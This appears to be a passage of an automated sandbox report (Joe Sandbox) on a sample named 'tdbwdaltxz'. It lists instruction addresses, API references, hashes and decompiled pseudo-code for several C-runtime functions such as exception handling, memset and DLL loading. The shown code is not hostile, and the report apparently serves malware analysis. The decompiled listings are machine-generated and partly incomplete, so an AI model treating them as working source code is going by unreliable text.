                        0x00403afe
                        0x00403b03
                        0x00403b04
                        0x00403b05
                        0x00403b06
                        0x00403b07
                        0x00403b0a
                        0x00403b0d
                        0x00403b0f
                        0x00000000
                        0x00403b11
                        0x00403b11
                        0x00403b11
                        0x00403b12
                        0x00403b14
                        0x00403b17
                        0x00403b18
                        0x00403b1d
                        0x00403b20
                        0x00403b22
                        0x00000000
                        0x00000000
                        0x00403b24
                        0x00403b27
                        0x00403b28
                        0x00403b2b
                        0x00403b2d
                        0x00000000
                        0x00403b2f
                        0x00403b2f
                        0x00403b32
                        0x00000000
                        0x00403b32
                        0x00000000
                        0x00403b2d
                        0x00403b46
                        0x00403b4c
                        0x00403b69
                        0x00403b6e
                        0x00403b6e
                        0x00403b71
                        0x00403b71
                        0x00000000
                        0x00403b35
                        0x00403b35
                        0x00403b36
                        0x00403b39
                        0x00403b3c
                        0x00403b3f
                        0x00403b3f
                        0x00000000
                        0x00403b44
                        0x00403ae1
                        0x00403ad3
                        0x00403b74
                        0x00403b77
                        0x00403b78
                        0x00403b7b
                        0x00403b7e
                        0x00403b81
                        0x00403b84
                        0x00403b84
                        0x00403b8d
                        0x00403b90
                        0x00403b90
                        0x00403aa9
                        0x00403b93
                        0x00403b97
                        0x00403b99
                        0x00403b9c
                        0x00403ba2
                        0x00403ba2
                        0x00403baa
                        0x00403baf
                        0x00403c19
                        0x00403c19
                        0x00403c1e
                        0x00403c22
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403bb1
                        0x00403bb4
                        0x00403bb7
                        0x00403bbb
                        0x00403bc9
                        0x00403bcb
                        0x00403be2
                        0x00403be6
                        0x00403bec
                        0x00403bed
                        0x00403bef
                        0x00000000
                        0x00403bf1
                        0x00000000
                        0x00403bf1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403bbd
                        0x00403bbd
                        0x00403bbf
                        0x00000000
                        0x00403bc1
                        0x00403bc1
                        0x00403bc5
                        0x00000000
                        0x00403bc7
                        0x00403bcd
                        0x00403bd2
                        0x00403bd5
                        0x00403bda
                        0x00403bdd
                        0x00000000
                        0x00403bdd
                        0x00403bc5
                        0x00403bbf
                        0x00403bbb
                        0x00403a60
                        0x00403a60
                        0x00403a67
                        0x00000000
                        0x00403a69
                        0x00403a69
                        0x00403a70
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403a70
                        0x00403a67
                        0x00403a5e
                        0x00403a51
                        0x004039d1
                        0x004039d9
                        0x004039dc
                        0x004039e1
                        0x004039e5
                        0x004039e8
                        0x004039ee
                        0x004039f1
                        0x00000000
                        0x004039f3
                        0x004039f3
                        0x004039f6
                        0x004039f8
                        0x00403c29
                        0x00403c29
                        0x00000000
                        0x004039fe
                        0x00403a06
                        0x00403a11
                        0x00000000
                        0x00000000
                        0x00403a1a
                        0x00403a1d
                        0x00403a1e
                        0x00403a21
                        0x00403a23
                        0x00000000
                        0x00403a29
                        0x00000000
                        0x00403a29
                        0x00000000
                        0x00403a23
                        0x004039fe
                        0x00403c2e
                        0x00403c2e
                        0x00403c30
                        0x00403c31
                        0x00403c38
                        0x00403c3b
                        0x00403c49
                        0x00403c4e
                        0x00403c53
                        0x00403c56
                        0x00403c5b
                        0x00403c5e
                        0x00403c61
                        0x00403c63
                        0x00403c65
                        0x00403c65
                        0x00403c6a
                        0x00403c76
                        0x00403c7c
                        0x00403c81
                        0x00403c84
                        0x00403c85
                        0x00000000
                        0x00403c85
                        0x004039f1
                        0x004039cf
                        0x0040398f
                        0x00403970
                        0x00403962
                        0x0040392e

                        APIs
                        • type_info::operator==.LIBVCRUNTIME ref: 00403A0A
                        • ___TypeMatch.LIBVCRUNTIME ref: 00403B18
                        • _UnwindNestedFrames.LIBCMT ref: 00403C6A
                        • CallUnexpected.LIBVCRUNTIME ref: 00403C85
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 2751267872-393685449
                        • Opcode ID: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                        • Instruction ID: eb951dfd93c377336a0bd22ac6a7177933b6abc1ee62d3cbfcc6e570eabf6f1d
                        • Opcode Fuzzy Hash: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                        • Instruction Fuzzy Hash: 00B17A75900209DFCF15DFA5C9819AEBBB8BF04316F14416BE8017B292C379EA51CF99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402310 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122COMMON
                        Download Yara Rule
                        C-Code - Quality: 53%
                        			E00402310(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed char _v36;
				void* _v40;
				signed int _t77;
				signed int _t84;
				intOrPtr _t85;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr _t89;
				signed int _t91;
				int _t93;
				signed int _t98;
				intOrPtr* _t102;
				intOrPtr _t103;
				signed int _t107;
				char _t109;
				signed int _t113;
				void* _t114;
				intOrPtr _t123;
				void* _t125;
				intOrPtr _t133;
				signed int _t135;
				void* _t139;
				void* _t141;
				void* _t149;

				_t118 = __edx;
				_t102 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t102 = E0040D360(__ecx,  *_t102);
				_t103 = _a8;
				_t6 = _t103 + 0x10; // 0x11
				_t133 = _t6;
				_push(_t133);
				_v20 = _t133;
				_v12 =  *(_t103 + 8) ^  *0x415010;
				E004022D0(_t103, __edx, __edi, _t133,  *(_t103 + 8) ^  *0x415010);
				E00402967(_a12);
				_t77 = _a4;
				_t141 = _t139 - 0x1c + 0x10;
				_t123 =  *((intOrPtr*)(_t103 + 0xc));
				if(( *(_t77 + 4) & 0x00000066) != 0) {
					__eflags = _t123 - 0xfffffffe;
					if(_t123 != 0xfffffffe) {
						_t118 = 0xfffffffe;
						E00402950(_t103, 0xfffffffe, _t133, 0x415010);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t77;
					_v28 = _a12;
					 *((intOrPtr*)(_t103 - 4)) =  &_v32;
					if(_t123 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t107 = _v12;
							_t84 = _t123 + (_t123 + 2) * 2;
							_t103 =  *((intOrPtr*)(_t107 + _t84 * 4));
							_t85 = _t107 + _t84 * 4;
							_t108 =  *((intOrPtr*)(_t85 + 4));
							_v24 = _t85;
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t109 = _v5;
								goto L7;
							} else {
								_t118 = _t133;
								_t86 = E004028F0(_t108, _t133);
								_t109 = 1;
								_v5 = 1;
								_t149 = _t86;
								if(_t149 < 0) {
									_v16 = 0;
									L13:
									_push(_t133);
									E004022D0(_t103, _t118, _t123, _t133, _v12);
									goto L14;
								} else {
									if(_t149 > 0) {
										_t87 = _a4;
										__eflags =  *_t87 - 0xe06d7363;
										if( *_t87 == 0xe06d7363) {
											__eflags =  *0x40e1c4;
											if(__eflags != 0) {
												_t98 = E0040D1F0(__eflags, "<&@");
												_t141 = _t141 + 4;
												__eflags = _t98;
												if(_t98 != 0) {
													_t135 =  *0x40e1c4; // 0x40263c
													 *0x40e160(_a4, 1);
													 *_t135();
													_t133 = _v20;
													_t141 = _t141 + 8;
												}
												_t87 = _a4;
											}
										}
										_t119 = _t87;
										E00402930(_t87, _a8, _t87);
										_t89 = _a8;
										__eflags =  *((intOrPtr*)(_t89 + 0xc)) - _t123;
										if( *((intOrPtr*)(_t89 + 0xc)) != _t123) {
											_t119 = _t123;
											E00402950(_t89, _t123, _t133, 0x415010);
											_t89 = _a8;
										}
										_push(_t133);
										 *((intOrPtr*)(_t89 + 0xc)) = _t103;
										E004022D0(_t103, _t119, _t123, _t133, _v12);
										E00402910();
										asm("int3");
										asm("int3");
										asm("int3");
										_t113 = _v32;
										_t91 = _v36 & 0x000000ff;
										_t125 = _v40;
										__eflags = _t113;
										if(_t113 == 0) {
											L46:
											return _v40;
										} else {
											_t93 = _t91 * 0x1010101;
											__eflags = _t113 - 0x20;
											if(_t113 <= 0x20) {
												L39:
												__eflags = _t113 & 0x00000003;
												while((_t113 & 0x00000003) != 0) {
													 *_t125 = _t93;
													_t125 = _t125 + 1;
													_t113 = _t113 - 1;
													__eflags = _t113 & 0x00000003;
												}
												__eflags = _t113 & 0x00000004;
												if((_t113 & 0x00000004) != 0) {
													 *_t125 = _t93;
													_t125 = _t125 + 4;
													_t113 = _t113 - 4;
													__eflags = _t113;
												}
												__eflags = _t113 & 0xfffffff8;
												while((_t113 & 0xfffffff8) != 0) {
													 *_t125 = _t93;
													 *(_t125 + 4) = _t93;
													_t125 = _t125 + 8;
													_t113 = _t113 - 8;
													__eflags = _t113 & 0xfffffff8;
												}
												goto L46;
											} else {
												__eflags = _t113 - 0x80;
												if(__eflags < 0) {
													L33:
													asm("bt dword [0x415030], 0x1");
													if(__eflags >= 0) {
														goto L39;
													} else {
														asm("movd xmm0, eax");
														asm("pshufd xmm0, xmm0, 0x0");
														goto L35;
													}
												} else {
													asm("bt dword [0x415c68], 0x1");
													if(__eflags >= 0) {
														asm("bt dword [0x415030], 0x1");
														if(__eflags >= 0) {
															goto L39;
														} else {
															asm("movd xmm0, eax");
															asm("pshufd xmm0, xmm0, 0x0");
															_t114 = _t125 + _t113;
															asm("movups [edi], xmm0");
															_t125 = _t125 + 0x00000010 & 0xfffffff0;
															_t113 = _t114 - _t125;
															__eflags = _t113 - 0x80;
															if(__eflags <= 0) {
																goto L33;
															} else {
																do {
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm0");
																	asm("movdqa [edi+0x20], xmm0");
																	asm("movdqa [edi+0x30], xmm0");
																	asm("movdqa [edi+0x40], xmm0");
																	asm("movdqa [edi+0x50], xmm0");
																	asm("movdqa [edi+0x60], xmm0");
																	asm("movdqa [edi+0x70], xmm0");
																	_t125 = _t125 + 0x80;
																	_t113 = _t113 - 0x80;
																	__eflags = _t113 & 0xffffff00;
																} while ((_t113 & 0xffffff00) != 0);
																L35:
																__eflags = _t113 - 0x20;
																if(_t113 < 0x20) {
																	L38:
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm0");
																	return _v40;
																} else {
																	do {
																		asm("movdqu [edi], xmm0");
																		asm("movdqu [edi+0x10], xmm0");
																		_t125 = _t125 + 0x20;
																		_t113 = _t113 - 0x20;
																		__eflags = _t113 - 0x20;
																	} while (_t113 >= 0x20);
																	__eflags = _t113 & 0x0000001f;
																	if((_t113 & 0x0000001f) == 0) {
																		goto L46;
																	} else {
																		goto L38;
																	}
																}
															}
														}
													} else {
														memset(_t125, _t93, _t113 << 0);
														return _v40;
													}
												}
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L47;
							L7:
							_t123 = _t103;
						} while (_t103 != 0xfffffffe);
						if(_t109 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L47:
			}


































                        0x00402310
                        0x00402317
                        0x0040231b
                        0x0040231c
                        0x00402322
                        0x0040232e
                        0x00402330
                        0x00402336
                        0x00402336
                        0x0040233f
                        0x00402341
                        0x00402344
                        0x00402347
                        0x0040234f
                        0x00402354
                        0x00402357
                        0x0040235a
                        0x00402361
                        0x004023bd
                        0x004023c0
                        0x004023c8
                        0x004023cf
                        0x00000000
                        0x004023cf
                        0x00000000
                        0x00402363
                        0x00402363
                        0x00402369
                        0x0040236f
                        0x00402375
                        0x004023e0
                        0x004023e9
                        0x00402377
                        0x00402377
                        0x00402377
                        0x0040237d
                        0x00402380
                        0x00402383
                        0x00402386
                        0x00402389
                        0x0040238e
                        0x004023a4
                        0x00000000
                        0x00402390
                        0x00402390
                        0x00402392
                        0x00402397
                        0x00402399
                        0x0040239c
                        0x0040239e
                        0x004023b4
                        0x004023d4
                        0x004023d4
                        0x004023d8
                        0x00000000
                        0x004023a0
                        0x004023a0
                        0x004023ea
                        0x004023ed
                        0x004023f3
                        0x004023f5
                        0x004023fc
                        0x00402403
                        0x00402408
                        0x0040240b
                        0x0040240d
                        0x0040240f
                        0x0040241c
                        0x00402422
                        0x00402424
                        0x00402427
                        0x00402427
                        0x0040242a
                        0x0040242a
                        0x004023fc
                        0x00402430
                        0x00402432
                        0x00402437
                        0x0040243a
                        0x0040243d
                        0x00402445
                        0x00402449
                        0x0040244e
                        0x0040244e
                        0x00402451
                        0x00402455
                        0x00402458
                        0x00402468
                        0x0040246d
                        0x0040246e
                        0x0040246f
                        0x00402470
                        0x00402474
                        0x0040247b
                        0x0040247f
                        0x00402481
                        0x004025c3
                        0x004025c9
                        0x00402487
                        0x00402487
                        0x0040248d
                        0x00402490
                        0x00402575
                        0x00402575
                        0x0040257b
                        0x0040257d
                        0x0040257f
                        0x00402580
                        0x00402583
                        0x00402583
                        0x0040258b
                        0x00402591
                        0x00402593
                        0x00402595
                        0x00402598
                        0x00402598
                        0x00402598
                        0x0040259b
                        0x004025a1
                        0x004025b0
                        0x004025b2
                        0x004025b5
                        0x004025b8
                        0x004025bb
                        0x004025bb
                        0x00000000
                        0x00402496
                        0x00402496
                        0x0040249c
                        0x0040252d
                        0x0040252d
                        0x00402535
                        0x00000000
                        0x00402537
                        0x00402537
                        0x0040253b
                        0x00000000
                        0x0040253b
                        0x004024a2
                        0x004024a2
                        0x004024aa
                        0x004024b5
                        0x004024bd
                        0x00000000
                        0x004024c3
                        0x004024c3
                        0x004024c7
                        0x004024cc
                        0x004024ce
                        0x004024d4
                        0x004024d7
                        0x004024d9
                        0x004024df
                        0x00000000
                        0x004024f0
                        0x004024f0
                        0x004024f0
                        0x004024f4
                        0x004024f9
                        0x004024fe
                        0x00402503
                        0x00402508
                        0x0040250d
                        0x00402512
                        0x00402517
                        0x0040251d
                        0x00402523
                        0x00402523
                        0x00402540
                        0x00402540
                        0x00402543
                        0x00402561
                        0x00402565
                        0x00402569
                        0x00402574
                        0x00402545
                        0x00402545
                        0x00402545
                        0x00402549
                        0x0040254e
                        0x00402551
                        0x00402554
                        0x00402554
                        0x00402559
                        0x0040255f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040255f
                        0x00402543
                        0x004024df
                        0x004024ac
                        0x004024ac
                        0x004024b4
                        0x004024b4
                        0x004024aa
                        0x0040249c
                        0x00402490
                        0x004023a2
                        0x00000000
                        0x004023a2
                        0x004023a0
                        0x0040239e
                        0x00000000
                        0x004023a7
                        0x004023a7
                        0x004023a9
                        0x004023b0
                        0x00000000
                        0x004023b2
                        0x00000000
                        0x004023b0
                        0x00402375
                        0x00000000

                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 00402347
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0040234F
                        • _ValidateLocalCookies.LIBCMT ref: 004023D8
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00402403
                        • _ValidateLocalCookies.LIBCMT ref: 00402458
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: <&@$csm
                        • API String ID: 1170836740-4289465445
                        • Opcode ID: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                        • Instruction ID: e86dbd8585806dd5d23d3718c6f18d027200fadb66ce12341b0a8af8e769dc64
                        • Opcode Fuzzy Hash: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                        • Instruction Fuzzy Hash: EF41D734A002199BCF10DF69C988A9EBBB0AF44314F14807AED14BB3D2D7B9DA55CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061490 Relevance: 12.1, APIs: 8, Instructions: 99memorystringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E01061490(WCHAR* _a4) {
				signed int _v8;
				void* _v12;
				int _t16;
				void* _t19;
				long _t21;
				signed int _t28;
				long _t36;
				void* _t37;
				void* _t39;
				void* _t45;
				WCHAR* _t47;
				void* _t48;
				long _t51;
				long _t52;
				void* _t53;
				short* _t54;
				long _t55;
				void* _t57;
				void* _t58;

				_t36 = _a4;
				if(_t36 != 0) {
					_t39 = 1;
					_t51 = _t36;
					do {
						_t16 = lstrlenW(_t51 + 4);
						_t51 =  *_t51;
						_t39 = _t39 + 3 + _t16;
						__eflags = _t51;
					} while (_t51 != 0);
					_t19 = HeapAlloc(GetProcessHeap(), _t51, _t39 + _t39);
					_v12 = _t19;
					_t52 = _t19;
					do {
						_push(0x3d);
						_push(_t36 + 4);
						_t21 = E01062AA0(_t37);
						_t57 = _t57 + 8;
						_a4 = _t21;
						__eflags = _t21;
						if(_t21 != 0) {
							 *_t52 = 0x20;
							_t45 = (_t21 - _t36 - 4 >> 1) + (_t21 - _t36 - 4 >> 1);
							_t53 = _t52 + 2;
							E01063C60(_t53, _t36 + 4, _t45);
							_t54 = _t53 + _t45;
							_t47 =  &(_a4[1]);
							_push(0x20);
							 *_t54 = 0x3d;
							_push(_t47);
							_t55 = _t54 + 2;
							__eflags = _t55;
							_a4 = _t47;
							_t28 = E01062AA0(_t37);
							_t58 = _t57 + 0x14;
							asm("sbb eax, eax");
							_v8 =  ~( ~_t28);
							if(__eflags != 0) {
								 *_t55 = 0x22;
								_t55 = _t55 + 2;
								__eflags = _t55;
							}
							_t48 = lstrlenW(_t47) + _t31;
							E01063C60(_t55, _a4, _t48);
							_t57 = _t58 + 0xc;
							_t52 = _t55 + _t48;
							__eflags = _v8;
							if(_v8 != 0) {
								 *_t52 = 0x22;
								_t52 = _t52 + 2;
								__eflags = _t52;
							}
						}
						_t36 =  *_t36;
						__eflags = _t36;
					} while (_t36 != 0);
					__eflags = 0;
					 *_t52 = 0;
					return _v12;
				} else {
					return 0;
				}
			}






















                        0x01061497
                        0x0106149c
                        0x010614a9
                        0x010614ae
                        0x010614b0
                        0x010614b4
                        0x010614ba
                        0x010614bf
                        0x010614c1
                        0x010614c1
                        0x010614d1
                        0x010614d7
                        0x010614da
                        0x010614e0
                        0x010614e3
                        0x010614e5
                        0x010614e6
                        0x010614eb
                        0x010614ee
                        0x010614f1
                        0x010614f3
                        0x01061507
                        0x0106150a
                        0x01061511
                        0x01061515
                        0x0106151a
                        0x01061524
                        0x01061527
                        0x01061529
                        0x0106152c
                        0x0106152d
                        0x0106152d
                        0x01061530
                        0x01061533
                        0x01061538
                        0x0106153d
                        0x01061541
                        0x01061544
                        0x0106154b
                        0x0106154e
                        0x0106154e
                        0x0106154e
                        0x01061558
                        0x01061560
                        0x01061565
                        0x01061568
                        0x0106156a
                        0x0106156e
                        0x01061575
                        0x01061578
                        0x01061578
                        0x01061578
                        0x0106156e
                        0x0106157b
                        0x0106157d
                        0x0106157d
                        0x01061585
                        0x01061588
                        0x01061593
                        0x0106149e
                        0x010614a4
                        0x010614a4

                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap_memmove_wcschrlstrlen$AllocProcess
                        • String ID:
                        • API String ID: 3798481777-0
                        • Opcode ID: cdaa6f93d190887152064542bbd4df7bd5c97cdfc5b8ef9162fe5acf01b877e5
                        • Instruction ID: 24ac637c953df66061c31803499ca73fe0b039d984d21936afe607a96081f0be
                        • Opcode Fuzzy Hash: cdaa6f93d190887152064542bbd4df7bd5c97cdfc5b8ef9162fe5acf01b877e5
                        • Instruction Fuzzy Hash: 6831E577D00206EBD7319F68DC84A9AB7FCAFA4350F15416AED89EB240E635D90187D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004082D3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004082D3(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x416300 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x40fa88 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x416300 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x416300 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00405A18(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00405A18(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                        0x004082dc
                        0x00408371
                        0x004082e4
                        0x004082e6
                        0x004082f0
                        0x004082f5
                        0x00408302
                        0x00408317
                        0x0040831b
                        0x00408381
                        0x00408386
                        0x0040838d
                        0x00408391
                        0x00408394
                        0x00408394
                        0x0040839a
                        0x0040839a
                        0x0040837c
                        0x00408380
                        0x00408380
                        0x0040831d
                        0x00408326
                        0x0040835f
                        0x0040836c
                        0x0040836e
                        0x0040836e
                        0x00000000
                        0x0040836e
                        0x00408330
                        0x00408335
                        0x0040833a
                        0x00000000
                        0x00000000
                        0x00408344
                        0x00408349
                        0x0040834e
                        0x00000000
                        0x00000000
                        0x00408353
                        0x00408359
                        0x0040835d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040835d
                        0x004082fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00408300
                        0x0040837a
                        0x00000000

                        APIs
                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,CF17A32A,?,004083E2,00000002,00000000,00000000), ref: 00408394
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeLibrary
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3664257935-537541572
                        • Opcode ID: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                        • Instruction ID: 573f1ada4d3828c880b6c39e4f7b2ce1dfde6baafd70aff868d57e190d54574b
                        • Opcode Fuzzy Hash: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                        • Instruction Fuzzy Hash: F1212B32A00221EBC7219B229D40A9F3368EB81B60F25053AED55B73D0DF79ED01CADD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010753D9 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E010753D9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				intOrPtr* _t17;
				intOrPtr* _t31;
				void* _t32;

				_push(8);
				_push(0x107e500);
				_t11 = E010668F0(__ebx, __edi, __esi);
				_t31 =  *((intOrPtr*)(_t32 + 8));
				if(_t31 != 0) {
					E01064D39(0xd);
					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
					if( *(_t31 + 4) != 0 && InterlockedDecrement( *(_t31 + 4)) == 0 &&  *(_t31 + 4) != 0x10809a8) {
						E01064ED2( *(_t31 + 4));
					}
					 *(_t32 - 4) = 0xfffffffe;
					E010759E9();
					if( *_t31 != 0) {
						E01064D39(0xc);
						 *(_t32 - 4) = 1;
						E0107024B( *_t31);
						_t17 =  *_t31;
						if(_t17 != 0 &&  *_t17 == 0 && _t17 != 0x1080d40) {
							E010700F1(_t17);
						}
						 *(_t32 - 4) = 0xfffffffe;
						E010759F5();
					}
					_t11 = E01064ED2(_t31);
				}
				return E01066935(_t11);
			}







                        0x01075944
                        0x01075946
                        0x0107594b
                        0x01075950
                        0x01075955
                        0x0107595d
                        0x01075963
                        0x0107596b
                        0x01075986
                        0x0107598b
                        0x0107598c
                        0x01075993
                        0x0107599b
                        0x0107599f
                        0x010759a5
                        0x010759ae
                        0x010759b4
                        0x010759b8
                        0x010759c7
                        0x010759cc
                        0x010759cd
                        0x010759d4
                        0x010759d4
                        0x010759da
                        0x010759df
                        0x010759e5

                        APIs
                        • __lock.LIBCMT ref: 0107595D
                          • Part of subcall function 01064D39: __mtinitlocknum.LIBCMT ref: 01064D4B
                          • Part of subcall function 01064D39: __amsg_exit.LIBCMT ref: 01064D57
                          • Part of subcall function 01064D39: EnterCriticalSection.KERNEL32(?,?,0106B376,0000000D,?,?,?,?,?,?,?,?,0107E188,00000008,0106B30F,00000000), ref: 01064D64
                        • InterlockedDecrement.KERNEL32(00000000), ref: 01075970
                        • _free.LIBCMT ref: 01075986
                          • Part of subcall function 01064ED2: HeapFree.KERNEL32(00000000,00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 01064EE6
                          • Part of subcall function 01064ED2: GetLastError.KERNEL32(00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 01064EF8
                        • __lock.LIBCMT ref: 0107599F
                        • ___removelocaleref.LIBCMT ref: 010759AE
                        • ___freetlocinfo.LIBCMT ref: 010759C7
                        • _free.LIBCMT ref: 010759DA
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                        • String ID:
                        • API String ID: 556454624-0
                        • Opcode ID: dcc7d24a435e672b7c68f2bee225c09b63b7d6e9a53b4f6580b2ad8de36ebc59
                        • Instruction ID: d23acd6f19b6c5fbd4e6a06fcf96036428ffa507910a50b814e5d6cf4224118c
                        • Opcode Fuzzy Hash: dcc7d24a435e672b7c68f2bee225c09b63b7d6e9a53b4f6580b2ad8de36ebc59
                        • Instruction Fuzzy Hash: A6018031D01702EAEBB57F68DC057DD7AE46F12730F20469DF1D8AA0D0DB749580C619
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106B3E0 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E0106B3E0(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E010653AC(_t3);
				if(E01064E88() != 0) {
					_t6 = E0106BBB1(_t5, E0106B140);
					 *0x1080670 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E01064F0A(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E0106B456();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E0106BBDB(_t9,  *0x1080670, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E0106B334(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E0106B456();
					return 0;
				}
			}








                        0x0106b3e0
                        0x0106b3ec
                        0x0106b3fb
                        0x0106b401
                        0x0106b406
                        0x0106b409
